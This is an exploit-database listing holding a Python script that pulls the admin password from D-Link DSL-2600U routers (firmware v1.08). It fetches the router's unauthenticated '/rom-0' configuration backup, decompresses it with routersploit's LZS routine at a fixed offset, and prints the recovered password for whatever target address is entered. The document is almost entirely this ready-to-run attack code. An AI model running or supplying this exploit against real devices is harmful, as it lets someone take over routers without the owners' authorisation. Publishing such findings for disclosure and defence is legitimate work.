Share
## https://sploitus.com/exploit?id=PACKETSTORM:222242
# Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure
    # Date: 2026-05-02
    # Exploit Author: Amir Hossein Jamshidi
    # Vendor Homepage: https://www.dlink.com
    # Version: DSL-2600U
    # Tested on: ubuntu
    # CVE : N/A
    # Firmware Version: v1.08
    from routersploit.libs.lzs.lzs import LZSDecompress
    import requests
    import re
    import sys
    print('''
        #################################################################################
        #        D-Link Router - 'rom-0' Admin Password Disclosure                      #
        #                   BY: Amir Hossein Jamshidi                                   #
        #               Mail: amirhosseinjamshidi64@gmail.com                           #
        #           github: https://github.com/amirhosseinjamshidi64                    #
        #                    Usage: python expoit.py                                    #
        #################################################################################
    ''')
    def exploit(url):
        data = requests.get(f"{url}/rom-0")
        #with open("data", 'wb') as f:
        #    f.write(data.content)
        data = data.content
        pos = 8568
        res, win = LZSDecompress(data[pos:])
        password = re.findall("([\040-\176]{5,})", res)
        return password[0]
    if __name__ == "__main__":
        url = input("Enter Target IP (example: http://192.168.1.1): ")
        print("password is: " + '\t' + exploit(url))